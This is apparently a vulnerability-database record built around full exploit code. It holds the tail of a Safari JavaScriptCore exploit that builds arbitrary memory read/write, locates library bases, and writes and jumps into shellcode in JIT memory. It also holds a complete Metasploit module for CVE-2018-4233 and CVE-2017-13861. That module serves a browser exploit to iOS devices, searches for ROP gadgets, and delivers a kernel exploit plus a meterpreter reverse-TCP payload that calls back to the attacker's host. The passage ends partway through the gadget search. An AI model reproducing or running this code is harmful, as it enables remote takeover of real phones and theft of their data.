\ndriver[2] = containerRawAddr; \nfloat64MemView[2] = header; \nfloat64MemView[3] = 0; \nfloat64MemView[5] = length; \nfloat64MemView[6] = mode; \n \n// Root the container object so it isn't garbage collected. \n// This will allocate a butterfly for the fake object and store a reference to the container there. \n// The fake array itself is rooted by the memory object (closures). \ndriver.container = container; \n \n/// \n/// END CRITICAL SECTION \n/// \n/// Objects are repaired, we will now survive a GC \n/// \nif (typeof(gc) !== 'undefined') \ngc(); \n \nmemory = { \nread: function(addr, length) { \ndriver[2] = memory.addrof(uint8MemView).asDouble(); \nfloat64MemView[2] = addr.asDouble(); \nvar a = new Array(length); \nfor (var i = 0; i < length; i++) \na[i] = uint8MemView[i]; \nreturn a; \n}, \n \nwrite: function(addr, data) { \ndriver[2] = memory.addrof(uint8MemView).asDouble(); \nfloat64MemView[2] = addr.asDouble(); \nfor (var i = 0; i < data.length; i++) \nuint8MemView[i] = data[i]; \n}, \n \nread8: function(addr) { \ndriver[2] = addr.asDouble(); \nreturn Int64.fromDouble(float64MemView[0]); \n}, \n \nwrite8: function(addr, value) { \ndriver[2] = addr.asDouble(); \nfloat64MemView[0] = value.asDouble(); \n}, \n \naddrof: function(obj) { \nfloat64MemView.leakme = obj; \nvar butterfly = Int64.fromDouble(driver[1]); \nreturn memory.read8(Sub(butterfly, 0x10)); \n}, \n}; \n \nprint(\"[+] Got stable memory read/write!\"); \n \n// Find binary base \nvar funcAddr = memory.addrof(Math.sin); \nvar executableAddr = memory.read8(Add(funcAddr, 24)); \nvar codeAddr = memory.read8(Add(executableAddr, 24)); \nvar vtabAddr = memory.read8(codeAddr); \nvar jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET); \nprint(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned); \nvar jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\")); \nprint(\"[*] JavaScriptCore.dylib @ \" + jscBase); \n \nvar dyldStubLoaderAddr = memory.read8(jscBase); \nvar dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET); \nvar strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET)); \nvar libCBase = Sub(strlenAddr, STRLEN_OFFSET); \nprint(\"[*] dyld.dylib @ \" + dyldBase); \nprint(\"[*] libsystem_c.dylib @ \" + libCBase); \n \nvar confstrAddr = Add(libCBase, CONFSTR_OFFSET); \nprint(\"[*] confstr @ \" + confstrAddr); \nvar dlopenAddr = Add(dyldBase, DLOPEN_OFFSET); \nprint(\"[*] dlopen @ \" + dlopenAddr); \n \n// Patching shellcode \nvar stage2Addr = memory.addrof(stage2); \nstage2Addr = memory.read8(Add(stage2Addr, 16)); \nprint(\"[*] Stage 2 payload @ \" + stage2Addr); \n \nstage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr); \nstage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr); \nstage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length)); \nstage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr); \nprint(\"[+] Shellcode patched\"); \n \n// Leak JITCode pointer poison value \nvar poison_addr = Add(jscBase, 305152); \nprint(\"[*] Poison value @ \" + poison_addr); \nvar poison = memory.read8(poison_addr); \nprint(\"[*] Poison value: \" + poison); \n \n// Shellcode \nvar func = makeJITCompiledFunction(); \nvar funcAddr = memory.addrof(func); \nprint(\"[+] Shellcode function object @ \" + funcAddr); \nvar executableAddr = memory.read8(Add(funcAddr, 24)); \nprint(\"[+] Executable instance @ \" + executableAddr); \nvar jitCodeAddr = memory.read8(Add(executableAddr, 24)); \nprint(\"[+] JITCode instance @ \" + jitCodeAddr); \n \nvar codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32)); \nvar codeAddr = Xor(codeAddrPoisoned, poison); \nprint(\"[+] RWX memory @ \" + codeAddr.toString()); \nprint(\"[+] Writing shellcode...\"); \nvar origCode = memory.read(codeAddr, stage1.length); \nmemory.write(codeAddr, stage1); \n \nprint(\"[!] Jumping into shellcode...\"); \nvar res = func(); \nif (res === 0) { \nprint(\"[+] Shellcode executed sucessfully!\"); \n} else { \nprint(\"[-] Shellcode failed to execute: error \" + res); \n} \n \nmemory.write(codeAddr, origCode); \nprint(\"[*] Restored previous JIT code\"); \n \nprint(\"[+] We are done here, continuing WebContent process as if nothing happened =)\"); \nif (typeof(gc) !== 'undefined') \ngc(); \n} \n \nready.then(function() { \ntry { \npwn(); \n} catch (e) { \nprint(\"[-] Exception caught: \" + e); \n} \n}).catch(function(err) { \nprint(\"[-] Initializatin failed\"); \n}); \n \n</script> \n</body> \n</html> \n^ \nunless datastore['DEBUG_EXPLOIT'] \nhtml.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') \nend \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150779/safari_proxy_object_type_confusion.rb.txt"}, {"lastseen": "2019-06-02T20:33:44", "description": "", "published": "2019-06-02T00:00:00", "type": "packetstorm", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4233", "CVE-2017-13861"], "modified": "2019-06-02T00:00:00", "id": "PACKETSTORM:153148", "href": "https://packetstormsecurity.com/files/153148/Safari-Webkit-Proxy-Object-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Safari Webkit Proxy Object Type Confusion', \n'Description' => %q{ \nThis module exploits a type confusion bug in the Javascript Proxy object in \nWebKit. The DFG JIT does not take into account that, through the use of a Proxy, \nit is possible to run arbitrary JS code during the execution of a CreateThis \noperation. This makes it possible to change the structure of e.g. an argument \nwithout causing a bailout, leading to a type confusion (CVE-2018-4233). \n \nThe type confusion leads to the ability to allocate fake Javascript objects, \nas well as the ability to find the address in memory of a Javascript object. \nThis allows us to construct a fake JSCell object that can be used to read \nand write arbitrary memory from Javascript. The module then uses a ROP chain \nto write the first stage shellcode into executable memory within the Safari \nprocess and kick off its execution. \n \nThe first stage maps the second stage macho (containing CVE-2017-13861) into \nexecutable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake \nexploit leads to a kernel task port (TFP0) that can read and write arbitrary \nkernel memory. The processes credential and sandbox structure in the kernel \nis overwritten and the meterpreter payloads code signature hash is added to \nthe kernels trust cache, allowing Safari to load and execute the (self-signed) \nmeterpreter payload. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'saelo', \n'niklasb', \n'Ian Beer', \n'siguza', \n], \n'References' => [ \n['CVE', '2018-4233'], \n['CVE', '2017-13861'], \n['URL', 'https://github.com/saelo/cve-2018-4233'], \n['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'], \n['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'], \n['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'], \n], \n'Arch' => ARCH_AARCH64, \n'Platform' => 'apple_ios', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' }, \n'Targets' => [[ 'Automatic', {} ]], \n'DisclosureDate' => 'Mar 15 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]), \nOptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]), \n]) \nend \n \ndef exploit_data(directory, file) \npath = ::File.join Msf::Config.data_directory, 'exploits', directory, file \n::File.binread path \nend \n \ndef payload_url \n\"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\" \nend \n \ndef get_version(user_agent) \nif user_agent =~ /OS (.*?) like Mac OS X\\)/ \nios_version = Gem::Version.new($1.gsub(\"_\", \".\")) \nreturn ios_version \nend \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \ndef on_request_uri(cli, request) \nif request.uri =~ %r{/apple-touch-icon*} \nreturn \nelsif request.uri =~ %r{/favicon*} \nreturn \nelsif request.uri =~ %r{/payload10$*} \npayload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1 \nsend_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'}) \nprint_good(\"Sent sha1 iOS 10 payload\") \nreturn \nelsif request.uri =~ %r{/payload11$*} \npayload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib \nsend_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'}) \nprint_good(\"Sent sha256 iOS 11 payload\") \nreturn \nend \n \nuser_agent = request['User-Agent'] \nprint_status(\"Requesting #{request.uri} from #{user_agent}\") \nversion = get_version(user_agent) \nios_11 = (version >= Gem::Version.new('11.0.0')) \nif request.uri =~ %r{/exploit$} \nloader_data = exploit_data('CVE-2017-13861', 'exploit') \nsrvhost = Rex::Socket.resolv_nbo_i(srvhost_addr) \nconfig = [srvhost, srvport].pack(\"Nn\") + payload_url \npayload_url_index = loader_data.index('PAYLOAD_URL') \nloader_data[payload_url_index, config.length] = config \nprint_good(\"Sent async_wake exploit\") \nsend_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) \nreturn \nend \n \nget_mem_rw_ios_10 = %Q^ \nfunction get_mem_rw(stage1) { \nvar structs = []; \nfunction sprayStructures() { \nfunction randomString() { \nreturn Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5) \n} \nfor (var i = 0; i < 4096; i++) { \nvar a = new Float64Array(1); \na[randomString()] = 1337; \nstructs.push(a) \n} \n} \nsprayStructures(); \nvar hax = new Uint8Array(4096); \nvar jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]); \nvar container = { \njsCellHeader: jsCellHeader.asJSValue(), \nbutterfly: false, \nvector: hax, \nlengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue() \n}; \nvar address = Add(stage1.addrof(container), 16); \nvar fakearray = stage1.fakeobj(address); \nwhile (!(fakearray instanceof Float64Array)) { \njsCellHeader.assignAdd(jsCellHeader, Int64.One); \ncontainer.jsCellHeader = jsCellHeader.asJSValue() \n} \nmemory = { \nread: function(addr, length) { \nfakearray[2] = i2f(addr); \nvar a = new Array(length); \nfor (var i = 0; i < length; i++) a[i] = hax[i]; \nreturn a \n}, \nreadInt64: function(addr) { \nreturn new Int64(this.read(addr, 8)) \n}, \nwrite: function(addr, data) { \nfakearray[2] = i2f(addr); \nfor (var i = 0; i < data.length; i++) hax[i] = data[i] \n}, \nwriteInt64: function(addr, val) { \nreturn this.write(addr, val.bytes()) \n}, \n}; \nvar empty = {}; \nvar header = memory.read(stage1.addrof(empty), 8); \nmemory.write(stage1.addrof(container), header); \nvar f64array = new Float64Array(8); \nheader = memory.read(stage1.addrof(f64array), 16); \nmemory.write(stage1.addrof(fakearray), header); \nmemory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]); \nfakearray.container = container; \nreturn memory; \n} \n^ \n \nget_mem_rw_ios_11 = %Q^ \nfunction get_mem_rw(stage1) { \nvar FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10; \nvar structure_spray = [] \nfor (var i = 0; i < 1000; ++i) { \nvar ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff} \nary['prop'+i] = 1 \nstructure_spray.push(ary) \n} \nvar manager = structure_spray[500] \nvar leak_addr = stage1.addrof(manager) \n//print('leaking from: '+ hex(leak_addr)) \nfunction alloc_above_manager(expr) { \nvar res \ndo { \nfor (var i = 0; i < ALLOCS; ++i) { \nstructure_spray.push(eval(expr)) \n} \nres = eval(expr) \n} while (stage1.addrof(res) < leak_addr) \nreturn res \n} \nvar unboxed_size = 100 \nvar unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']') \nvar boxed = alloc_above_manager('[{}]') \nvar victim = alloc_above_manager('[]') \n// Will be stored out-of-line at butterfly - 0x10 \nvictim.p0 = 0x1337 \nfunction victim_write(val) { \nvictim.p0 = val \n} \nfunction victim_read() { \nreturn victim.p0 \n} \ni32[0] = 0x200 // Structure ID \ni32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing \nvar outer = { \np0: 0, // Padding, so that the rest of inline properties are 16-byte aligned \np1: f64[0], \np2: manager, \np3: 0xfffffff, // Butterfly indexing mask \n} \nvar fake_addr = stage1.addrof(outer) + FPO + 0x8; \n//print('fake obj @ ' + hex(fake_addr)) \nvar unboxed_addr = stage1.addrof(unboxed) \nvar boxed_addr = stage1.addrof(boxed) \nvar victim_addr = stage1.addrof(victim) \n//print('leak ' + hex(leak_addr) \n//+ ' unboxed ' + hex(unboxed_addr) \n//+ ' boxed ' + hex(boxed_addr) \n//+ ' victim ' + hex(victim_addr)) \nvar holder = {fake: {}} \nholder.fake = stage1.fakeobj(fake_addr) \n// From here on GC would be uncool \n// Share a butterfly for easier boxing/unboxing \nvar shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8]) \nvar boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8] \nholder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly) \nvar victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8] \nfunction set_victim_addr(where) { \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10) \n} \nfunction reset_victim_addr() { \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly \n} \nvar stage2 = { \naddrof: function(victim) { \nboxed[0] = victim \nreturn f2i(unboxed[0]) \n}, \nfakeobj: function(addr) { \nunboxed[0] = i2f(addr) \nreturn boxed[0] \n}, \nwrite64: function(where, what) { \nset_victim_addr(where) \nvictim_write(this.fakeobj(what)) \nreset_victim_addr() \n}, \nread64: function(where) { \nset_victim_addr(where) \nvar res = this.addrof(victim_read()) \nreset_victim_addr() \nreturn res; \n}, \nwrite_non_zero: function(where, values) { \nfor (var i = 0; i < values.length; ++i) { \nif (values[i] != 0) \nthis.write64(where + i*8, values[i]) \n} \n}, \nreadInt64: function(where) { \nif (where instanceof Int64) { \nwhere = Add(where, 0x10); \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble(); \n} else { \nset_victim_addr(where); \n} \nboxed[0] = victim_read(); \nvar res = f2i(unboxed[0]); \nreset_victim_addr(); \nreturn new Int64(res); \n}, \nread: function(addr, length) { \nvar address = new Int64(addr); \nvar a = new Array(length); \nvar i; \n \nfor (i = 0; i + 8 < length; i += 8) { \nv = this.readInt64(Add(address, i)).bytes() \nfor (var j = 0; j < 8; j++) { \na[i+j] = v[j]; \n} \n} \n \nv = this.readInt64(Add(address, i)).bytes() \nfor (var j = i; j < length; j++) { \na[j] = v[j - i]; \n} \n \nreturn a \n}, \ntest: function() { \nthis.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie \nif (0xfff != this.read64(boxed_addr + 0x10)) { \nfail(2) \n} \n}, \n} \n// Test read/write \nstage2.test() \nreturn stage2; \n} \n^ \n \nget_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10 \nutils = exploit_data \"CVE-2018-4233\", \"utils.js\" \nint64 = exploit_data \"CVE-2018-4233\", \"int64.js\" \ndump_offsets = '' \nif datastore['DUMP_OFFSETS'] \ndump_offsets = %Q^ \nvar offsetstr = uuid + \" : { \"; \nvar offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\", \n\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ]; \nfor (var i = 0; i < offsetarray.length; i++) { \nvar offset = offsets[offsetarray[i]]; \nif (offset) { \nvar offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\"); \noffsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \"; \n} \n} \noffsetstr += \"}, \"; \nprompt(\"offsets: \", offsetstr); \n^ \nend \n \nhtml = %Q^ \n<html> \n<body> \n<script> \n \n#{utils} \n#{int64} \n \nprint = alert; \nITERS = 1E4; \nALLOCS = 1E3; \n \nvar conversion_buffer = new ArrayBuffer(8); \nvar f64 = new Float64Array(conversion_buffer); \nvar i32 = new Uint32Array(conversion_buffer); \nvar BASE32 = 0x100000000; \n \nfunction f2i(f) { \nf64[0] = f; \nreturn i32[0] + BASE32 * i32[1]; \n} \n \nfunction i2f(i) { \ni32[0] = i % BASE32; \ni32[1] = i / BASE32; \nreturn f64[0]; \n} \n \nfunction hexit(x) { \nif (x instanceof Int64) return x.toString(); \nif (x < 0) return \"-\" + hex(-x); \nreturn \"0x\" + x.toString(16); \n} \n \nfunction fail(x) { \nprint('FAIL ' + x); \nlocation.reload(); \nthrow null; \n} \n \ncounter = 0; \n \n// CVE-2018-4233 \nfunction trigger(constr, modify, res, val) { \nreturn eval(` \nvar o = [13.37] \nvar Constructor${counter} = function(o) { ${constr} } \nvar hack = false \nvar Wrapper = new Proxy(Constructor${counter}, { \nget: function() { \nif (hack) { \n${modify} \n} \n} \n}) \nfor (var i = 0; i < ITERS; ++i) \nnew Wrapper(o) \nhack = true \nvar bar = new Wrapper(o) \n${res} \n`) \n} \n \nvar workbuf = new ArrayBuffer(0x1000000); \nvar payload = new Uint8Array(workbuf); \n \nfunction pwn() { \nvar stage1 = { \naddrof: function(victim) { \nreturn f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim)) \n}, \nfakeobj: function(addr) { \nreturn trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr)) \n}, \ntest: function() { \nvar addr = this.addrof({ \na: 4919 \n}); \nvar x = this.fakeobj(addr); \nif (x.a != 4919) fail(\"stage1\") \n} \n}; \nstage1.test(); \n \nvar stage2 = get_mem_rw(stage1); \nvar FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"} \nvar memory = stage2; \nmemory.u32 = _u32; \n \nvar wrapper = document.createElement(\"div\"); \nvar wrapper_addr = stage1.addrof(wrapper); \nvar el_addr = memory.readInt64(wrapper_addr + FPO); \nvar vtab = memory.readInt64(el_addr); \n \nvar anchor = memory.readInt64(vtab); \nvar hdr = Sub(anchor, anchor.lo() & 0xfff); \nvar b = []; \nwhile(true) \n{ \nif (memory.readInt64(hdr).lo() == 4277009104) { \nfail('WebCore ' + hdr + ' post spectre support coming soon'); \n} \nif(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\")) \n{ \nbreak; \n} \nhdr = Sub(hdr, 0x1000); \n} \n \nvar base_seg = null; \nvar nsegs = memory.u32(Add(hdr, 0x14)); \nvar segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20); \nvar segs = []; \nfor(var i = 0; i < nsegs; ++i) \n{ \nvar off = i * 0x20; \nvar seg = \n{ \naddr: new Int64(segdata.slice(off + 0x0, off + 0x8)), \nsize: new Int64(segdata.slice(off + 0x8, off + 0x10)), \nfileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)), \nmaxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)), \ninitprot: b2u32(segdata.slice(off + 0x1c, off + 0x20)) \n}; \nsegs.push(seg); \nif(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0)) \n{ \nbase_seg = seg; \n} \n} \nif(base_seg == null) \n{ \nfail(\"base_seg\"); \n} \n \nvar cache_slide = Sub(hdr, base_seg.addr); \nvar uuid = memory.readInt64(Add(hdr, 0x58)).lo(); \nvar offset_cache = { \n// iPod Touch 10.1.1 \n788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc, \n\"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, }, \n \n// iPhone 5S 10.2.1 \n3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc, \n\"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, }, \n \n// iPhone 6S 11.0.3 \n425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c, \n\"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, }, \n}; \n \nvar offsets = offset_cache[uuid]; \nif (offsets) \n{ \nvar k = Object.keys(offsets); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \noffsets[s] = Add(offsets[s], cache_slide); \n} \n} \nelse \n{ \nvar syms = {}; \nvar gadgets = {}; \n \nfor(var i = 0; i < segs.length; ++i) \n{ \nsegs[i].addr = Add(segs[i].addr, cache_slide); \n} \nvar libs = \n{ \n\"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"], \n#{ ios_11 ? ' \n\"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], \n\"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"], \n' : ' \n\"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"], \n\"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"], \n\"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], \n'} \n} \n \n#{ ios_11 ? ' \nvar opcodes = { \n// ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret \n\"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ], \n// blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret \n\"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ], \n// mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8 \n\"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ], \n// ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30]; \n// ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret \n\"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ], \n// mov x4, x20 ; blr x8 \n\"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ], \n} \nvar opcode_libs = [ \n\"/usr/lib/PN548.dylib\", // dispatch, stackloader \n\"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader \n]; \n \n' : ' \nvar opcodes = { \n// mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28 \n\"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ], \n\"dispatch\": [ \n// blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret \n[ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ], \n// blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret \n[ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ], \n], \n\"stackloader\": [ \n// ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30]; \n// ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret \n[ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ], \n// sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30]; \n// ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret \n[ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ], \n], \n}; \n \nvar opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ]; \n'} \n \nvar imgs = Add(hdr, memory.u32(Add(hdr, 0x18))); \nvar nimgs = memory.u32(Add(hdr, 0x1c)); \nfor(var i = 0; i < nimgs; ++i) \n{ \nvar straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18))); \nvar fn = function(i) \n{ \nreturn memory.read(Add(straddr, i), 1)[0]; \n}; \nvar base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide); \nif(opcode_libs.some(lib => strcmp(fn, lib))) \n{ \nvar ncmds = memory.u32(Add(base, 0x10)); \nfor(var j = 0, off = 0x20; j < ncmds; ++j) \n{ \nvar cmd = memory.u32(Add(base, off)); \nif(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64 \n{ \nvar nsects = memory.u32(Add(base, off + 0x40)); \nfor(var k = 0, o = off + 0x48; k < nsects; ++k) \n{ \nif(strcmp(memory.read(Add(base, o), 0x10), \"__text\")) \n{ \nvar keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k]) \nif (keys.length == 0) break; \n \nvar addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide) \nvar size = memory.u32(Add(base, o + 0x28)) \n \n// Copy the entire __text region into a Uint32Array for faster processing. \n// Previously you could map a Uint32Array over the data, but on i7+ devices \n// this caused access violations. \n// Instead we read the entire region and copy it into a Uint32Array. The \n// memory.read primitive has a weird limitation where it's only able to read \n// up to 4096 bytes. to get around this we'll read multiple times and combine \n// them into one. \n \nvar allData = new Uint32Array(size / 4) \nfor (var r = 0; r < size; r += 4096) { \n// Check to ensure we don't read out of the region we want \nvar qty = 4096 \nif (size - r < qty) { \nqty = size - r \n} \nvar data = memory.read(Add(addr, r), qty) \n \n// Data is an array of single bytes. This code takes four entries \n// and converts them into a single 32-bit integer. It then adds it \n// into the `allData` array at the given index \nfor (var h = 0; h < qty; h += 4) { \nvar fourBytes = b2u32(data.slice(h, h + 4)) \nallData[(r + h) / 4] = fourBytes \n} \n} \n \n// Loop through the entire data map looking for each gadget we need \nfor (var f = 0; f < size && keys.length > 0; f++) { \n \n// Check every gadget \nfor (var z = 0; z < keys.length; z++) { \nvar key = keys[z]; \nvar opcode_list = opcodes[key]; \nfor (var y = 0; y < opcode_list.length; y++) { \nvar opcode = opcode_list[y]; \nfor (var t = 0; t < opcode.length; t++) { \nvar op = allData[f+t]; \nif (op == opcode[t]) { \nif (t == opcode.length - 1) { \ngadgets[key] = Add(addr, f*4); \nkeys.splice(z, 1); \nz = keys.length; \nbreak; \n} \ncontinue; \n} \nbreak; \n} \n} \n} \n} \n \nbreak; \n} \no += 0x50; \n} \nbreak; \n} \noff += memory.u32(Add(base, off + 0x4)); \n} \ncontinue; \n} \nvar lookup = null; \nfor(var k = Object.keys(libs), j = 0; j < k.length; ++j) \n{ \nif(strcmp(fn, k[j])) \n{ \nlookup = libs[k[j]]; \nbreak; \n} 